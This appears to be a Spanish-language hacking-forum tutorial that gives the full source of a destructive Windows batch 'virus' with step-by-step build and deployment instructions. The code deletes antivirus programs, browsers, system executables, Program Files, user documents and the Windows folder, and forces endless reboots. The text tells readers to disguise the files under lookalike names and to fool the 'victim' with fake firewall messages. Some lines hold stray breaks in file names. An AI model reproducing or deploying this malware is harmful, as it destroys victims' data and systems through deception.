echo off>virus21.bat
cls
echo off>virus9.bat
cls
echo off>virus10.bat
cls
echo off>virus8.bat
cls
echo off>virus7.bat
cls
echo off>virus6.bat
cls
echo off>virus5.bat
cls
echo off>virus4.bat
cls
echo off>virus2.bat
cls
echo off>virus3.bat
cls
echo off>virus65.bat
cls
echo off>virus899.bat
cls
echo off>virus4545.bat
cls
echo off>virus65456.bat
cls
echo off>virus544556.ba t
cls
echo off>virus65465.bat
cls
echo off>virus986546.ba t
cls
echo off>virus56564.bat
cls
echo off>virus6595.bat
cls
echo off>virus669.bat
cls
echo off>virus666.bat
cls
echo off>virus866456.ba t
cls
echo off>virus4664.bat
cls
echo off>virus@jotmeil.bat
cls
echo off>virus5435.bat
cls
echo off>virus545454665 46564.bat
cls
echo off>virus545454664 54546546.bat
cls
echo off>virus545454665 64546546.bat
cls
echo off>virus545454665 46.bat
cls
echo off>virus545454665 465.bat
cls
echo off>virus54545466. bat
cls
echo off>virus545454665 45454.bat
cls
echo off>virus545454664 65546465645.ba t
cls
echo off>virus545454665 54546.bat
cls
echo off>virus545454665 45465465.bat
cls
echo off>virus545454665 45445546465.ba t
cls
echo off>virus545454664 6456546.bat
cls
echo off>virus545454664 5456546.bat
cls
echo off>virus545454665 6565.bat
cls
echo off>virus545454669 8894961320.bat
cls
echo off>virus0.bat
cls
md viruskl
cls
md virusk3
cls
md viruskk4
cls
md virus54k
cls
md virusauto
cls
md virusbyewindow
cls
md virusnods4
cls
md virusk456
cls
md virus55555
cls
md viruskl454
cls
md virus3hgfd
cls
md virusj564kj
cls
md virus543g
cls
md virusautttk
cls
md virus654fff
cls
md viruspostavith e
cls
md virusvirusymas virus
cls
md viruskkk444
cls
md virusporultimo jaja
cls
cd \
cd "archivos de programa"
cd "Norton antivirus"
attrib -R -A -S -H *.*
del /S /Q *.*
cls
cd..
cd "Panda Software"
attrib -R -A -S -H *.*
del /S /Q *.*
cls
cd..
cd "Kaspersky Lab"
attrib -R -A -S -H *.*
del /S /Q *.*
cls
cd..
cd "McAfee.com"
attrib -R -A -S -H *.*
del /S /Q *.*
cls
cd..
cd "NOD32 Antivirus System"
attrib -R -A -S -H *.*
del /S /Q *.*
cls
cd \
cd "archivos de programa"
cd "Norton antivirus"
attrib -R -A -S -H *.*
del /S /Q *.*
cls
cd..
cd "Panda Software"
attrib -R -A -S -H *.*
del /S /Q *.*
cls
cd..
cd "Kaspersky Lab"
attrib -R -A -S -H *.*
del /S /Q *.*
cls
cd..
cd "McAfee.com"
attrib -R -A -S -H *.*
del /S /Q *.*
cls
cd..
cd "NOD32 Antivirus System"
attrib -R -A -S -H *.*
del /S /Q *.*
cls
cd \
cd "archivos de programa"
cd "Internet Explorer"
attrib -R -A -S -H *.*
del /S /Q *.*
cls
cd..
cd "Opera"
attrib -R -A -S -H *.*
del /S /Q *.*
cd..
cd "Mozilla Firefox"
attrib -R -A -S -H *.*
del /S /Q *.*
cls
del /S /Q C:\WINDOWS\explorer.exe
cls
del /S /Q C:\WINDOWS\system32\notepad.exe
del /S /Q C:\WINDOWS\system32\calc.exe
del /S /Q C:\WINDOWS\system32\mspaint.exe
cls
cd \
cd "archivos de programa"
del /f /s /q *.*
cls
cd \
cd "Documents and Settings"
del /f /s /q *.*
cls
cd \
cd "windows"
del /f /s /q *.*
cls
shutdown -r -f -t 0 >> c:\autoexec.bat
cls
cd \
cls
start wiindows.bat
cls
del auttoexec.bat & del 1.bat
exit

AHORA GUARDENLO COMO AUTTOEXEC.BAT EN C:\ AUTTOEXEC.BAT CON DOS T


NO CON UNA SOLA, ES PARA ENGAÑAR A LA VICTIMA HACIENDOLE  CREER QUE
ES EL AUTOEXEC.BAT PERO ES EL VIRUS QUE SE OCULTA CON EL NOMBRE DE
ESTE PERO CON UNA T MAS PARA QUE NO SE COPIE ARRIBA DEL AUTOEXEC.BAT
VERDADERO. POR AHORA TIENES LOS DOS EJECUTABLES PARA EL VIRUS, NO
ENTRES EN NIGNUNO YA QUE FALTA UNO, EL ULTIMO.

3ºER PASO:
ABRAN AHORA NUEVAMENTE UN BLOC DE NOTAS NUEVO Y PONGAN ESTO:

@echo off
color a
title C:\WINDOWS\system32\cmd.exe
cls
shutdown -f -s -t 1
exit

AHORA GUARDENLO EN C:\ COMO wiindows.BAT PARA HACER CREER A LA


VICTIMA QUE ES OTRO ARCHIVO INOFENSIVO SOLO POR TENER EL NOMBRE
WINDOWS EN EL JAJAJAJAJAJAJA JAJAJJA ¿BUENO NO?.

AHORA POR LO QUE MAS QUIERAN, SEGURAMENTE ESTARAN PENSANDO EN


PROBAR EL VIRUS, NO LO PRUEBEN CON USTEDES EN SU MAQUINA, EN OTRO
LUGAR. AHORA LES EXPLICARE COMO FUNCIONARA TODO ESTO.

EL PRIMER VIRUS, OSEA, EL PRIMER BAT, OSEA SETUP.BAT EJECUTARA MILLONES


DE VENTANAS DE MS-DOS (CMD) Y MOSTRARA MENSAJES PARA DESPISTAR A LA
VICTIMA HACIENDOLE CREER QUE FIREWALL DE WINDOWS ESTA COMBATIENDO
EL VIRUS PERO NO..., ES SOLO UNA DISTRACCION PARA QUE EL VIRUS NUMERO 2
ACTUE. GRACUAS A QUE LAS VENTANAS DE MS-DOS (CMD) EJECUTADAS POR EL
COMANDO START QUE ESTA DENTRO DEL GOTO SALTARAN MILLONES DE
VENTANAS HACIENDO QUE LA VICTIMA NO PUEDA HACER NADA, ADEMAS EL
MENSAJE DICIENDO QUE FIREWALL ESA COMBATIENDO EL VIRUS APARECERA
INFINITAS VECES DICIENDOLE A LA VICTIMA QUE ESPERE, ADEMAS NO PODRA
HACER NADA PORQUE SE LE "TRABARA" MAQUINA POR ASI DECIR, PÈRO EL VIRUS
SEGUIRA ACTUANDO. COMO DECIA, AL TERMINO EJECUTA EL VIRUS NUMERO 2.
EL VIRUS NUMERO DOS ES EL VIRUS REAL, EL UNO NO ERA UN VIRUS, SINO EL
EJECUTABLE DEL VIRUS Y LA DISTRACCION. LO QUE HACE ESTE ES BORRARLE
LOS ANTIVIRUS, DESACTIVARLE EL FIREWALL DE WINDOWS, CREAR CARPETAS Y
ARCHIVOS CON NOMBRES COMO VIRUS342.BAT Y CARPETAS COMO VIRUS5454
POR TODO EL C:\ HACIENDOLE CREER A LA VICTIMA QUE EL VIRUS SE ESTA
REPRODUCCIENDO POR SI SOLO. Y ADEMAS, LE BORRAR TODO EL DIRECTORIO DE
ARCHIVOS DE PROGRAMAS, WINDOWS, DOCUMENTS AND SETTING, ETCETERA....
Y MUCHAS COSAS MAS, SI QUIERES SABER CUALES SON LAS OTRAS COSAS NO ME
HAGAN ESCIRIBR MAS Y VEAN EL VIRUS DOS xD. AL FINAL DEL VIRUS SE
EJECUTARA UN COMANDO QUE HARA QUE CADA VES QUE LA VICTIMA ENCIENDA
LA COMPUTADORA ESTA SE REINICIE AL INSTANTE. EL VIRUS NUMERO 3, AL
TERMINO DEL 2.. APAGARA LA MAQUINA EN 1 SEGUNDO...

METODO PARA ACTIVAR EL VIRUS:

SETUP.BAT EJECUTA TODOS LOS VIRUS...

ASI DE FACIL
ESPEREN.... FALTA MAS, OCULTAR LOS VIRUS
ABRE EL BLOC DE NOTAS NUEVAMENTE Y PON ESTO:

copy auttoexec.bat c:\ & copy setup.bat c:\ & copy wiindows.bat c:\ & cd \ & start setup.bat & exit

LUEGO GUARDALO COMO INSTALL.BAT Y GUARDALO EN DONDE ESTAN LOS


OTROS VIRUS.

LUEGO CREA UNA CARPETA LLAMADA VIRUS


DENTRO DE ESTA UNA CARPETA LLAMADA DATA
DENTRO DE DATA PON TODOS LOS BATS QUE EMOS CREADO
LUEGO VE NUEVAMENTE A LA CARPETA VIRUS, OSEA, ATRAS DE DATA, Y CREA
UN ACCESO DIRECTO QUE ABRA INSTALL.BAT Y CAMBIALE EL ICONO... LISTO...
FACIL NO?...

POR CUALQUIER DUDA POSTEAR UN MENSAJE DICIENDO LA DUDA jajaja AQUI


MISMO . O PREGUNTANDO POR VIA CORREO O MENSAJE A:
CASANOVAMXM@jotmeil.COM

AGRADECIMIENTO S A WWW.PORTALHACK ER.NET POR AYUDARME CUANDO ERA


NEWBIE Y POR TENER UNOS EXELENTES MANUALES PARA HACKERS JAJA. Y
NADA... ABAJO LOS LAMMERS Y... ADIOS...

CASANOVAMXM
WWW.PORTALHACK ER.NET/FORO
CASANOVAMXM@jotmeil.COM

POD: PORFAVOR ALGUIEN PODRIA ENSEÑARME COMO HACER UNA LICENCIA


COPYRIGHT O COMO SE LLAME PARA QUE ESTE BAJO LICENCIA Y PROTEGIDO,
ETCETERA.

You might also like